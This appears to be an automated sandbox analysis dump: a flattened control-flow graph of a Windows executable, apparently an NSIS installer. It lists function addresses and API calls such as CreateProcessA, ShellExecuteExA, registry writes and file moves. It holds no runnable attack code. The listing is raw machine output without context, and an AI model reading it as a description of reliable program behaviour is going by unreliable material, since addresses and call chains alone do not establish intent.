402c5e 21 API calls 3144->3145 3146 401772 3145->3146 3150 405e4f 3146->3150 3148 401779 3149 405e4f 2 API calls 3148->3149 3149->3148 3151 405e5a GetTickCount GetTempFileNameA 3150->3151 3152 405e8b 3151->3152 3153 405e87 3151->3153 3152->3148 3153->3151 3153->3152 3913 40196c 3914 402c5e 21 API calls 3913->3914 3915 401973 lstrlenA 3914->3915 3916 40264d 3915->3916 3917 401ff0 3918 402c5e 21 API calls 3917->3918 3919 401ff7 3918->3919 3920 406620 2 API calls 3919->3920 3921 401ffd 3920->3921 3923 40200f 3921->3923 3924 4061eb wsprintfA 3921->3924 3924->3923 3925 4014f4 SetForegroundWindow 3926 402aea 3925->3926 3927 404778 3928 404788 3927->3928 3929 4047ae 3927->3929 3931 40432d 22 API calls 3928->3931 3930 404394 8 API calls 3929->3930 3933 4047ba 3930->3933 3932 404795 SetDlgItemTextA 3931->3932 3932->3929 3729 40177e 3730 402c5e 21 API calls 3729->3730 3731 401785 3730->3731 3732 4017a3 3731->3732 3733 4017ab 3731->3733 3768 40628d lstrcpynA 3732->3768 3769 40628d lstrcpynA 3733->3769 3736 4017b6 3738 405c1f 3 API calls 3736->3738 3737 4017a9 3740 406587 5 API calls 3737->3740 3739 4017bc lstrcatA 3738->3739 3739->3737 3762 4017c8 3740->3762 3741 406620 2 API calls 3741->3762 3743 405dfb 2 API calls 3743->3762 3744 4017df CompareFileTime 3744->3762 3745 4018a3 3747 4053d1 28 API calls 3745->3747 3746 40187a 3748 4053d1 28 API calls 3746->3748 3756 40188f 3746->3756 3749 4018ad 3747->3749 3748->3756 3750 403168 35 API calls 3749->3750 3752 4018c0 3750->3752 3751 40628d lstrcpynA 3751->3762 3753 4018d4 SetFileTime 3752->3753 3755 4018e6 CloseHandle 3752->3755 3753->3755 3754 406320 21 API calls 3754->3762 3755->3756 3757 4018f7 3755->3757 3758 4018fc 3757->3758 3759 40190f 3757->3759 3760 406320 21 API calls 3758->3760 3761 406320 21 API calls 3759->3761 3763 401904 lstrcatA 3760->3763 3764 401917 3761->3764 3762->3741 3762->3743 3762->3744 3762->3745 3762->3746 3762->3751 3762->3754 3765 4059a3 MessageBoxIndirectA 3762->3765 3767 405e20 GetFileAttributesA CreateFileA 3762->3767 3763->3764 3766 4059a3 MessageBoxIndirectA 3764->3766 3765->3762 3766->3756 3767->3762 3768->3737 3769->3736 3934 40167e 3935 402c5e 21 API calls 3934->3935 3936 401684 3935->3936 3937 406620 2 API calls 3936->3937 3938 40168a 3937->3938 3939 40197e 3940 402c3c 21 API calls 3939->3940 3941 401985 3940->3941 3942 402c3c 21 API calls 3941->3942 3943 401992 3942->3943 3944 402c5e 21 API calls 3943->3944 3945 4019a9 lstrlenA 3944->3945 3946 4019b9 3945->3946 3947 4019f9 3946->3947 3951 40628d lstrcpynA 3946->3951 3949 4019e9 3949->3947 3950 4019ee lstrlenA 3949->3950 3950->3947 3951->3949 3952 401000 3953 401037 BeginPaint GetClientRect 3952->3953 3954 40100c DefWindowProcA 3952->3954 3956 4010f3 3953->3956 3957 401179 3954->3957 3958 401073 CreateBrushIndirect FillRect DeleteObject 3956->3958 3959 4010fc 3956->3959 3958->3956 3960 401102 CreateFontIndirectA 3959->3960 3961 401167 EndPaint 3959->3961 3960->3961 3962 401112 6 API calls 3960->3962 3961->3957 3962->3961 3963 401502 3964 401507 3963->3964 3966 40152d 3963->3966 3965 402c3c 21 API calls 3964->3965 3965->3966 3967 404805 GetDlgItem 3968 40481c 3967->3968 3969 404830 SetWindowTextA 3968->3969 3970 405cb8 4 API calls 3968->3970 3971 40432d 22 API calls 3969->3971 3972 404826 3970->3972 3973 40484c 3971->3973 3972->3969 3975 405c1f 3 API calls 3972->3975 3974 40432d 22 API calls 3973->3974 3976 40485a 3974->3976 3975->3969 4022 404362 SendMessageA 3976->4022 3978 404860 3979 4066b5 5 API calls 3978->3979 3983 404867 3979->3983 3980 404af5 3981 404394 8 API calls 3980->3981 3982 404b09 3981->3982 3983->3980 3984 40494b 3983->3984 3986 406320 21 API calls 3983->3986 3984->3980 4023 405987 GetDlgItemTextA 3984->4023 3988 4048db SHBrowseForFolderA 3986->3988 3987 40497b 3989 405d0d 18 API calls 3987->3989 3988->3984 3990 4048f3 CoTaskMemFree 3988->3990 3991 404981 3989->3991 3992 405c1f 3 API calls 3990->3992 4024 40628d lstrcpynA 3991->4024 3993 404900 3992->3993 3995 404937 SetDlgItemTextA 3993->3995 3998 406320 21 API calls 3993->3998 3995->3984 3996 404998 3997 4066b5 5 API calls 3996->3997 4004 40499f 3997->4004 3999 40491f lstrcmpiA 3998->3999 3999->3995 4002 404930 lstrcatA 3999->4002 4000 4049db 4025 40628d lstrcpynA 4000->4025 4002->3995 4003 4049e2 4005 405cb8 4 API calls 4003->4005 4004->4000 4008 405c66 2 API calls 4004->4008 4010 404a33 4004->4010 4006 4049e8 GetDiskFreeSpaceA 4005->4006 4009 404a0c MulDiv 4006->4009 4006->4010 4008->4004 4009->4010 4011 404aa4 4010->4011 4026 404c3b 4010->4026 4012 404ac7 4011->4012 4014 40140b 2 API calls 4011->4014 4037 40434f KiUserCallbackDispatcher 4012->4037 4014->4012 4017 404aa6 SetDlgItemTextA 4017->4011 4018 404a96 4029 404b76 4018->4029 4019 404ae3 4019->3980 4038 404718 4019->4038 4022->3978 4023->3987 4024->3996 4025->4003 4027 404b76 24 API calls 4026->4027 4028 404a91 4027->4028 4028->4017 4028->4018 4030 404b8c 4029->4030 4031 406320 21 API calls 4030->4031 4032 404bf0 4031->4032 4033 406320 21 API calls 4032->4033 4034 404bfb 4033->4034 4035 406320 21 API calls 4034->4035 4036 404c11 lstrlenA wsprintfA SetDlgItemTextA 4035->4036 4036->4011 4037->4019 4039 404726 4038->4039 4040 40472b SendMessageA 4038->4040 4039->4040 4040->3980 4041 401a85 4042 402c3c 21 API calls 4041->4042 4043 401a8c 4042->4043 4044 402c3c 21 API calls 4043->4044 4045 401a33 4044->4045 4046 401588 4047 402a67 4046->4047 4050 4061eb wsprintfA 4047->4050 4049 402a6c 4050->4049 4051 401b88 4052 402c5e 21 API calls 4051->4052 4053 401b8f 4052->4053 4054 402c3c 21 API calls 4053->4054 4055 401b98 wsprintfA 4054->4055 4056 402aea 4055->4056 4057 401d8a 4058 401d90 4057->4058 4059 401d9d GetDlgItem 4057->4059 4060 402c3c 21 API calls 4058->4060 4061 401d97 4059->4061 4060->4061 4062 401dde GetClientRect LoadImageA SendMessageA 4061->4062 4063 402c5e 21 API calls 4061->4063 4065 401e3f 4062->4065 4067 401e4b 4062->4067 4063->4062 4066 401e44 DeleteObject 4065->4066 4065->4067 4066->4067 4068 40278b 4069 402791 4068->4069 4070 402799 FindClose 4069->4070 4071 402aea 4069->4071 4070->4071 3154 40240d 3155 402c5e 21 API calls 3154->3155 3156 40241e 3155->3156 3157 402c5e 21 API calls 3156->3157 3158 402427 3157->3158 3159 402c5e 21 API calls 3158->3159 3160 402431 GetPrivateProfileStringA 3159->3160 4072 40280d 4073 402c5e 21 API calls 4072->4073 4074 402819 4073->4074 4075 40282f 4074->4075 4076 402c5e 21 API calls 4074->4076 4077 405dfb 2 API calls 4075->4077 4076->4075 4078 402835 4077->4078 4100 405e20 GetFileAttributesA CreateFileA 4078->4100 4080 402842 4081 4028fe 4080->4081 4084 4028e6 4080->4084 4085 40285d GlobalAlloc 4080->4085 4082 402905 DeleteFileA 4081->4082 4083 402918 4081->4083 4082->4083 4087 403168 35 API calls 4084->4087 4085->4084 4086 402876 4085->4086 4101 403390 SetFilePointer 4086->4101 4089 4028f3 CloseHandle 4087->4089 4089->4081 4090 40287c 4091 40337a ReadFile 4090->4091 4092 402885 GlobalAlloc 4091->4092 4093 402895 4092->4093 4094 4028cf 4092->4094 4095 403168 35 API calls 4093->4095 4096 405ec7 WriteFile 4094->4096 4099 4028a2 4095->4099 4097 4028db GlobalFree 4096->4097 4097->4084 4098 4028c6 GlobalFree 4098->4094 4099->4098 4100->4080 4101->4090 3161 40550f 3162 405531 GetDlgItem GetDlgItem GetDlgItem 3161->3162 3163 4056ba 3161->3163 3206 404362 SendMessageA 3162->3206 3165 4056c2 GetDlgItem CreateThread CloseHandle 3163->3165 3166 4056ea 3163->3166 3165->3166 3229 4054a3 OleInitialize 3165->3229 3168 405718 3166->3168 3169 405700 ShowWindow ShowWindow 3166->3169 3170 405739 3166->3170 3167 4055a1 3172 4055a8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3167->3172 3171 405773 3168->3171 3174 405728 3168->3174 3175 40574c ShowWindow 3168->3175 3211 404362 SendMessageA 3169->3211 3215 404394 3170->3215 3171->3170 3181 405780 SendMessageA 3171->3181 3179 405616 3172->3179 3180 4055fa SendMessageA SendMessageA 3172->3180 3212 404306 3174->3212 3177 40576c 3175->3177 3178 40575e 3175->3178 3185 404306 SendMessageA 3177->3185 3184 4053d1 28 API calls 3178->3184 3186 405629 3179->3186 3187 40561b SendMessageA 3179->3187 3180->3179 3183 405745 3181->3183 3188 405799 CreatePopupMenu 3181->3188 3184->3177 3185->3171 3207 40432d 3186->3207 3187->3186 3189 406320 21 API calls 3188->3189 3191 4057a9 AppendMenuA 3189->3191 3193 4057c7 GetWindowRect 3191->3193 3194 4057da TrackPopupMenu 3191->3194 3192 405639 3195 405642 ShowWindow 3192->3195 3196 405676 GetDlgItem SendMessageA 3192->3196 3193->3194 3194->3183 3198 4057f6 3194->3198 3199 405665 3195->3199 3200 405658 ShowWindow 3195->3200 3196->3183 3197 40569d SendMessageA SendMessageA 3196->3197 3197->3183 3201 405815 SendMessageA 3198->3201 3210 404362 SendMessageA 3199->3210 3200->3199 3201->3201 3202 405832 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3201->3202 3204 405854 SendMessageA 3202->3204 3204->3204 3205 405876 GlobalUnlock SetClipboardData CloseClipboard 3204->3205 3205->3183 3206->3167 3208 406320 21 API calls 3207->3208 3209 404338 SetDlgItemTextA 3208->3209 3209->3192 3210->3196 3211->3168 3213 404313 SendMessageA 3212->3213 3214 40430d 3212->3214 3213->3170 3214->3213 3216 404457 3215->3216 3217 4043ac GetWindowLongA 3215->3217 3216->3183 3217->3216 3218 4043c1 3217->3218 3218->3216 3219 4043f1 3218->3219 3220 4043ee GetSysColor 3218->3220 3221 404401 SetBkMode 3219->3221 3222 4043f7 SetTextColor 3219->3222 3220->3219 3223 404419 GetSysColor 3221->3223 3224 40441f 3221->3224 3222->3221 3223->3224 3225 404430 3224->3225 3226 404426 SetBkColor 3224->3226 3225->3216 3227 404443 DeleteObject 3225->3227 3228 40444a CreateBrushIndirect 3225->3228 3226->3225 3227->3228 3228->3216 3236 404379 3229->3236 3231 4054c6 3235 4054ed 3231->3235 3239 401389 3231->3239 3232 404379 SendMessageA 3233 4054ff OleUninitialize 3232->3233 3235->3232 3237 404391 3236->3237 3238 404382 SendMessageA 3236->3238 3237->3231 3238->3237 3241 401390 3239->3241 3240 4013fe 3240->3231 3241->3240 3242 4013cb MulDiv SendMessageA 3241->3242 3242->3241 3243 40168f 3244 402c5e 21 API calls 3243->3244 3245 401696 3244->3245 3246 402c5e 21 API calls 3245->3246 3247 40169f 3246->3247 3248 402c5e 21 API calls 3247->3248 3249 4016a8 MoveFileA 3248->3249 3250 4016b4 3249->3250 3251 4016bb 3249->3251 3253 401423 28 API calls 3250->3253 3255 40230f 3251->3255 3257 406620 FindFirstFileA 3251->3257 3253->3255 3258 4016ca 3257->3258 3259 406636 FindClose 3257->3259 3258->3255 3260 406066 MoveFileExA 3258->3260 3259->3258 3261 406087 3260->3261 3262 40607a 3260->3262 3261->3250 3264 405ef6 3262->3264 3265 405f42 GetShortPathNameA 3264->3265 3266 405f1c 3264->3266 3268 406061 3265->3268 3269 405f57 3265->3269 3291 405e20 GetFileAttributesA CreateFileA 3266->3291 3268->3261 3269->3268 3271 405f5f wsprintfA 3269->3271 3270 405f26 CloseHandle GetShortPathNameA 3270->3268 3272 405f3a 3270->3272 3273 406320 21 API calls 3271->3273 3272->3265 3272->3268 3274 405f87 3273->3274 3292 405e20 GetFileAttributesA CreateFileA 3274->3292 3276 405f94 3276->3268 3277 405fa3 GetFileSize GlobalAlloc 3276->3277 3278 405fc5 3277->3278 3279 40605a CloseHandle 3277->3279 3280 405e98 ReadFile 3278->3280 3279->3268 3281 405fcd 3280->3281 3281->3279 3293 405d85 lstrlenA 3281->3293 3284 405fe4 lstrcpyA 3287 406006 3284->3287 3285 405ff8 3286 405d85 4 API calls 3285->3286 3286->3287 3288 40603d SetFilePointer 3287->3288 3289 405ec7 WriteFile 3288->3289 3290 406053 GlobalFree 3289->3290 3290->3279 3291->3270 3292->3276 3294 405dc6 lstrlenA 3293->3294 3295 405dce 3294->3295 3296 405d9f lstrcmpiA 3294->3296 3295->3284 3295->3285 3296->3295 3297 405dbd CharNextA 3296->3297 3297->3294 4102 404b10 4103 404b20 4102->4103 4104 404b3c 4102->4104 4113 405987 GetDlgItemTextA 4103->4113 4106 404b42 SHGetPathFromIDListA 4104->4106 4107 404b6f 4104->4107 4109 404b59 SendMessageA 4106->4109 4110 404b52 4106->4110 4108 404b2d SendMessageA 4108->4104 4109->4107 4111 40140b 2 API calls 4110->4111 4111->4109 4113->4108 4114 401490 4115 4053d1 28 API calls 4114->4115 4116 401497 4115->4116 4117 401a12 4118 402c5e 21 API calls 4117->4118 4119 401a19 4118->4119 4120 402c5e 21 API calls 4119->4120 4121 401a22 4120->4121 4122 401a29 lstrcmpiA 4121->4122 4123 401a3b lstrcmpA 4121->4123 4124 401a2f 4122->4124 4123->4124 3402 401594 3403 4015a4 ShowWindow 3402->3403 3404 4015ab 3402->3404 3403->3404 3405 4015b9 ShowWindow 3404->3405 3406 402aea 3404->3406 3405->3406 4125 402318 4126 402c5e 21 API calls 4125->4126 4127 40231e 4126->4127 4128 402c5e 21 API calls 4127->4128 4129 402327 4128->4129 4130 402c5e 21 API calls 4129->4130 4131 402330 4130->4131 4132 406620 2 API calls 4131->4132 4133 402339 4132->4133 4134 40234a lstrlenA lstrlenA 4133->4134 4135 40233d 4133->4135 4136 4053d1 28 API calls 4134->4136 4137 4053d1 28 API calls 4135->4137 4139 402345 4135->4139 4138 402386 SHFileOperationA 4136->4138 4137->4139 4138->4135 4138->4139 4140 404498 4142 4045ba 4140->4142 4143 4044ae 4140->4143 4141 404629 4144 4046f3 4141->4144 4146 404633 GetDlgItem 4141->4146 4142->4141 4142->4144 4150 4045fe GetDlgItem SendMessageA 4142->4150 4145 40432d 22 API calls 4143->4145 4152 404394 8 API calls 4144->4152 4147 404504 4145->4147 4148 4046b1 4146->4148 4149 404649 4146->4149 4151 40432d 22 API calls 4147->4151 4148->4144 4153 4046c3 4148->4153 4149->4148 4157 40466f SendMessageA LoadCursorA SetCursor 4149->4157 4173 40434f KiUserCallbackDispatcher 4150->4173 4155 404511 CheckDlgButton 4151->4155 4156 4046ee 4152->4156 4159 4046c9 SendMessageA 4153->4159 4160 4046da 4153->4160 4171 40434f KiUserCallbackDispatcher 4155->4171 4174 40473c 4157->4174 4159->4160 4160->4156 4164 4046e0 SendMessageA 4160->4164 4161 404624 4165 404718 SendMessageA 4161->4165 4164->4156 4165->4141 4166 40452f GetDlgItem 4172 404362 SendMessageA 4166->4172 4168 404545 SendMessageA 4169 404563 GetSysColor 4168->4169 4170 40456c SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4168->4170 4169->4170 4170->4156 4171->4166 4172->4168 4173->4161 4177 405969 ShellExecuteExA 4174->4177 4176 4046a2 LoadCursorA SetCursor 4176->4148 4177->4176 4178 402198 4179 402c5e 21 API calls 4178->4179 4180 40219f 4179->4180 4181 402c5e 21 API calls 4180->4181 4182 4021a9 4181->4182 4183 402c5e 21 API calls 4182->4183 4184 4021b3 4183->4184 4185 402c5e 21 API calls 4184->4185 4186 4021c0 4185->4186 4187 402c5e 21 API calls 4186->4187 4188 4021ca 4187->4188 4189 40220c CoCreateInstance 4188->4189 4190 402c5e 21 API calls 4188->4190 4191 40222b 4189->4191 4195 4022d9 4189->4195 4190->4189 4194 4022b9 MultiByteToWideChar 4191->4194 4191->4195 4192 401423 28 API calls 4193 40230f 4192->4193 4194->4195 4195->4192 4195->4193 4196 40239a 4197 4023a1 4196->4197 4200 4023b4 4196->4200 4198 406320 21 API calls 4197->4198 4199 4023ae 4198->4199 4201 4059a3 MessageBoxIndirectA 4199->4201 4201->4200 4202 40269a 4203 402c3c 21 API calls 4202->4203 4206 4026a4 4203->4206 4204 402712 4205 405e98 ReadFile 4205->4206 4206->4204 4206->4205 4207 402714 4206->4207 4208 402724 4206->4208 4211 4061eb wsprintfA 4207->4211 4208->4204 4210 40273a SetFilePointer 4208->4210 4210->4204 4211->4204 4212 402a1b 4213 402a22 4212->4213 4214 402a6e 4212->4214 4217 402c3c 21 API calls 4213->4217 4220 402a6c 4213->4220 4215 4066b5 5 API calls 4214->4215 4216 402a75 4215->4216 4218 402c5e 21 API calls 4216->4218 4219 402a30 4217->4219 4221 402a7e 4218->4221 4222 402c3c 21 API calls 4219->4222 4221->4220 4230 4062e0 4221->4230 4224 402a3f 4222->4224 4229 4061eb wsprintfA 4224->4229 4225 402a8c 4225->4220 4234 4062ca 4225->4234 4229->4220 4231 4062eb 4230->4231 4232 40630e IIDFromString 4231->4232 4233 406307 4231->4233 4232->4225 4233->4225 4237 4062af WideCharToMultiByte 4234->4237 4236 402aad CoTaskMemFree 4236->4220 4237->4236 4238 40149d 4239 4023b4 4238->4239 4240 4014ab PostQuitMessage 4238->4240 4240->4239 4241 401f1e 4242 402c5e 21 API calls 4241->4242 4243 401f24 4242->4243 4244 402c5e 21 API calls 4243->4244 4245 401f2d 4244->4245 4246 402c5e 21 API calls 4245->4246 4247 401f36 4246->4247 4248 402c5e 21 API calls 4247->4248 4249 401f3f 4248->4249 4250 401423 28 API calls 4249->4250 4251 401f46 4250->4251 4258 405969 ShellExecuteExA 4251->4258 4253 401f81 4254 40672a 5 API calls 4253->4254 4255 4027ed 4253->4255 4256 401f9b CloseHandle 4254->4256 4256->4255 4258->4253 2998 401fa0 2999 402c5e 21 API calls 2998->2999 3000 401fa6 2999->3000 3001 4053d1 28 API calls 3000->3001 3002 401fb0 3001->3002 3013 405926 CreateProcessA 3002->3013 3005 401fd7 CloseHandle 3008 4027ed 3005->3008 3009 401fcb 3010 401fd0 3009->3010 3011 401fd9 3009->3011 3021 4061eb wsprintfA 3010->3021 3011->3005 3014 401fb6 3013->3014 3015 405959 CloseHandle 3013->3015 3014->3005 3014->3008 3016 40672a WaitForSingleObject 3014->3016 3015->3014 3017 406744 3016->3017 3018 406756 GetExitCodeProcess 3017->3018 3022 4066f1 3017->3022 3018->3009 3021->3005 3023 40670e PeekMessageA 3022->3023 3024 406704 DispatchMessageA 3023->3024 3025 40671e WaitForSingleObject 3023->3025 3024->3023 3025->3017 4259 402020 4260 402c5e 21 API calls 4259->4260 4261 402027 4260->4261 4262 4066b5 5 API calls 4261->4262 4263 402036 4262->4263 4264 4020be 4263->4264 4265 40204e GlobalAlloc 4263->4265 4265->4264 4266 402062 4265->4266 4267 4066b5 5 API calls 4266->4267 4268 402069 4267->4268 4269 4066b5 5 API calls 4268->4269 4270 402073 4269->4270 4270->4264 4274 4061eb wsprintfA 4270->4274 4272 4020ae 4275 4061eb wsprintfA 4272->4275 4274->4272 4275->4264 4276 401922 4277 401959 4276->4277 4278 402c5e 21 API calls 4277->4278 4279 40195e 4278->4279 4280 405a4f 71 API calls 4279->4280 4281 401967 4280->4281 4282 401d23 4283 402c3c 21 API calls 4282->4283 4284 401d29 IsWindow 4283->4284 4285 401a33 4284->4285 3051 4024a5 3052 402c5e 21 API calls 3051->3052 3053 4024b5 3052->3053 3054 402c5e 21 API calls 3053->3054 3055 4024bf 3054->3055 3068 402cee 3055->3068 3058 402c5e 21 API calls 3062 4024ed lstrlenA 3058->3062 3059 4024f4 3060 402500 3059->3060 3072 402c3c 3059->3072 3064 402522 RegSetValueExA 3060->3064 3075 403168 3060->3075 3061 402aea 3062->3059 3066 402538 RegCloseKey 3064->3066 3066->3061 3069 402d09 3068->3069 3095 406141 3069->3095 3073 406320 21 API calls 3072->3073 3074 402c51 3073->3074 3074->3060 3076 40317e 3075->3076 3077 4031ac 3076->3077 3104 403390 SetFilePointer 3076->3104 3099 40337a 3077->3099 3081 403313 3083 403355 3081->3083 3089 403317 3081->3089 3082 4031c9 GetTickCount 3084 403218 3082->3084 3087 4032fd 3082->3087 3086 40337a ReadFile 3083->3086 3085 40337a ReadFile 3084->3085 3084->3087 3091 40326e GetTickCount 3084->3091 3092 403293 MulDiv wsprintfA 3084->3092 3102 405ec7 WriteFile 3084->3102 3085->3084 3086->3087 3087->3064 3088 40337a ReadFile 3088->3089 3089->3087 3089->3088 3090 405ec7 WriteFile 3089->3090 3090->3089 3091->3084 3093 4053d1 28 API calls 3092->3093 3093->3084 3096 406150 3095->3096 3097 4024cf 3096->3097 3098 40615b RegCreateKeyExA 3096->3098 3097->3058 3097->3059 3097->3061 3098->3097 3105 405e98 ReadFile 3099->3105 3103 405ee5 3102->3103 3103->3084 3104->3077 3106 4031b7 3105->3106 3106->3081 3106->3082 3106->3087 4286 401925 4287 402c5e 21 API calls 4286->4287 4288 40192c 4287->4288 4289 4059a3 MessageBoxIndirectA 4288->4289 4290 401935 4289->4290 4291 4027a5 4292 4027ab 4291->4292 4293 4027af FindNextFileA 4292->4293 4295 4027c1 4292->4295 4294 402800 4293->4294 4293->4295 4297 40628d lstrcpynA 4294->4297 4297->4295 4298 401bac 4299 401bb9 4298->4299 4300 401bfd 4298->4300 4301 401c41 4299->4301 4306 401bd0 4299->4306 4302 401c01 4300->4302 4303 401c26 GlobalAlloc 4300->4303 4304 406320 21 API calls 4301->4304 4313 4023b4 4301->4313 4302->4313 4319 40628d lstrcpynA 4302->4319 4305 406320 21 API calls 4303->4305 4307 4023ae 4304->4307 4305->4301 4317 40628d lstrcpynA 4306->4317 4312 4059a3 MessageBoxIndirectA 4307->4312 4310 401c13 GlobalFree 4310->4313 4311 401bdf 4318 40628d lstrcpynA 4311->4318 4312->4313 4315 401bee 4320 40628d lstrcpynA 4315->4320 4317->4311 4318->4315 4319->4310 4320->4313 4321 4029af 4322 402c3c 21 API calls 4321->4322 4325 4029b5 4322->4325 4323 406320 21 API calls 4324 4027ed 4323->4324 4325->4323 4325->4324 4326 402631 4327 402c5e 21 API calls 4326->4327 4328 402638 4327->4328 4331 405e20 GetFileAttributesA CreateFileA 4328->4331 4330 402644 4331->4330 4332 404d32 GetDlgItem GetDlgItem 4333 404d88 7 API calls 4332->4333 4344 404faf 4332->4344 4334 404e30 DeleteObject 4333->4334 4335 404e24 SendMessageA 4333->4335 4336 404e3b 4334->4336 4335->4334 4338 404e72 4336->4338 4339 406320 21 API calls 4336->4339 4337 405091 4341 40513d 4337->4341 4351 4050ea SendMessageA 4337->4351 4374 404fa2 4337->4374 4340 40432d 22 API calls 4338->4340 4345 404e54 SendMessageA SendMessageA 4339->4345 4346 404e86 4340->4346 4342 405147 SendMessageA 4341->4342 4343 40514f 4341->4343 4342->4343 4353 405161 ImageList_Destroy 4343->4353 4354 405168 4343->4354 4366 405178 4343->4366 4344->4337 4349 404c80 5 API calls 4344->4349 4375 40501e 4344->4375 4345->4336 4350 40432d 22 API calls 4346->4350 4347 405083 SendMessageA 4347->4337 4348 404394 8 API calls 4352 40533e 4348->4352 4349->4375 4355 404e97 4350->4355 4357 4050ff SendMessageA 4351->4357 4351->4374 4353->4354 4358 405171 GlobalFree 4354->4358 4354->4366 4359 404f71 GetWindowLongA SetWindowLongA 4355->4359 4365 404ee9 SendMessageA 4355->4365 4368 404f6c 4355->4368 4371 404f27 SendMessageA 4355->4371 4372 404f3b SendMessageA 4355->4372 4356 4052f2 4361 405304 ShowWindow GetDlgItem ShowWindow 4356->4361 4356->4374 4360 405112 4357->4360 4358->4366 4362 404f8a 4359->4362 4367 405123 SendMessageA 4360->4367 4361->4374 4363 404fa7 4362->4363 4364 404f8f ShowWindow 4362->4364 4385 404362 SendMessageA 4363->4385 4384 404362 SendMessageA 4364->4384 4365->4355 4366->4356 4373 404d00 4 API calls 4366->4373 4379 4051b3 4366->4379 4367->4341 4368->4359 4368->4362 4371->4355 4372->4355 4373->4379 4374->4348 4375->4337 4375->4347 4376 4052bd 4377 4052c8 InvalidateRect 4376->4377 4380 4052d4 4376->4380 4377->4380 4378 4051e1 SendMessageA 4383 4051f7 4378->4383 4379->4378 4379->4383 4380->4356 4381 404c3b 24 API calls 4380->4381 4381->4356 4382 40526b SendMessageA SendMessageA 4382->4383 4383->4376 4383->4382 4384->4374 4385->4344 3320 403e33 3321 403e4b 3320->3321 3322 403fac 3320->3322 3321->3322 3323 403e57 3321->3323 3324 403ffd 3322->3324 3325 403fbd GetDlgItem GetDlgItem 3322->3325 3327 403e62 SetWindowPos 3323->3327 3328 403e75 3323->3328 3326 404057 3324->3326 3334 401389 2 API calls 3324->3334 3329 40432d 22 API calls 3325->3329 3330 404379 SendMessageA 3326->3330 3347 403fa7 3326->3347 3327->3328 3331 403ec0 3328->3331 3332 403e7e ShowWindow 3328->3332 3333 403fe7 SetClassLongA 3329->3333 3383 404069 3330->3383 3337 403ec8 DestroyWindow 3331->3337 3338 403edf 3331->3338 3335 403f99 3332->3335 3336 403e9e GetWindowLongA 3332->3336 3339 40140b 2 API calls 3333->3339 3340 40402f 3334->3340 3341 404394 8 API calls 3335->3341 3336->3335 3342 403eb7 ShowWindow 3336->3342 3392 4042b6 3337->3392 3343 403ee4 SetWindowLongA 3338->3343 3344 403ef5 3338->3344 3339->3324 3340->3326 3346 404033 SendMessageA 3340->3346 3341->3347 3342->3331 3343->3347 3344->3335 3345 403f01 GetDlgItem 3344->3345 3350 403f12 SendMessageA IsWindowEnabled 3345->3350 3354 403f2f 3345->3354 3346->3347 3348 40140b 2 API calls 3348->3383 3349 4042b8 DestroyWindow KiUserCallbackDispatcher 3349->3392 3350->3347 3350->3354 3351 4042e7 ShowWindow 3351->3347 3352 406320 21 API calls 3352->3383 3353 403f34 3359 404306 SendMessageA 3353->3359 3354->3353 3355 403f3c 3354->3355 3357 403f83 SendMessageA 3354->3357 3358 403f4f 3354->3358 3355->3353 3355->3357 3356 40432d 22 API calls 3356->3383 3357->3335 3361 403f57 3358->3361 3362 403f6c 3358->3362 3360 403f6a 3359->3360 3360->3335 3399 40140b 3361->3399 3363 40140b 2 API calls 3362->3363 3365 403f73 3363->3365 3365->3335 3365->3353 3366 40432d 22 API calls 3367 4040e4 GetDlgItem 3366->3367 3368 404101 ShowWindow KiUserCallbackDispatcher 3367->3368 3369 4040f9 3367->3369 3393 40434f KiUserCallbackDispatcher 3368->3393 3369->3368 3371 40412b EnableWindow 3376 40413f 3371->3376 3372 404144 GetSystemMenu EnableMenuItem SendMessageA 3373 404174 SendMessageA 3372->3373 3372->3376 3373->3376 3376->3372 3394 404362 SendMessageA 3376->3394 3395 403e14 3376->3395 3398 40628d lstrcpynA 3376->3398 3378 4041a3 lstrlenA 3379 406320 21 API calls 3378->3379 3380 4041b4 SetWindowTextA 3379->3380 3381 401389 2 API calls 3380->3381 3381->3383 3382 4041f8 DestroyWindow 3384 404212 CreateDialogParamA 3382->3384 3382->3392 3383->3347 3383->3348 3383->3349 3383->3352 3383->3356 3383->3366 3383->3382 3385 404245 3384->3385 3384->3392 3386 40432d 22 API calls 3385->3386 3387 404250 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3386->3387 3388 401389 2 API calls 3387->3388 3389 404296 3388->3389 3389->3347 3390 40429e ShowWindow 3389->3390 3391 404379 SendMessageA 3390->3391 3391->3392 3392->3347 3392->3351 3393->3371 3394->3376 3396 406320 21 API calls 3395->3396 3397 403e22 SetWindowTextA 3396->3397 3397->3376 3398->3378 3400 401389 2 API calls 3399->3400 3401 401420 3400->3401 3401->3353 3407 4025b5 3408 402c9e 21 API calls 3407->3408 3409 4025bf 3408->3409 3410 402c3c 21 API calls 3409->3410 3411 4025c8 3410->3411 3412 4025d6 3411->3412 3417 4027ed 3411->3417 3413 4025e3 RegEnumKeyA 3412->3413 3414 4025ef RegEnumValueA 3412->3414 3415 40260b RegCloseKey 3413->3415 3414->3415 3416 402604 3414->3416 3415->3417 3416->3415 4386 4014b7 4387 4014bd 4386->4387 4388 401389 2 API calls 4387->4388 4389 4014c5 4388->4389 3718 4039bc 3719 4039d4 3718->3719 3720 4039c6 CloseHandle 3718->3720 3725 403a01 3719->3725 3720->3719 3723 405a4f 71 API calls 3724 4039e5 3723->3724 3726 403a0f 3725->3726 3727 4039d9 3726->3727 3728 403a14 FreeLibrary GlobalFree 3726->3728 3727->3723 3728->3727 3728->3728

                          Executed Functions

                          Function 004033D8 Relevance: 96.7, APIs: 33, Strings: 22, Instructions: 430stringfilecomCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
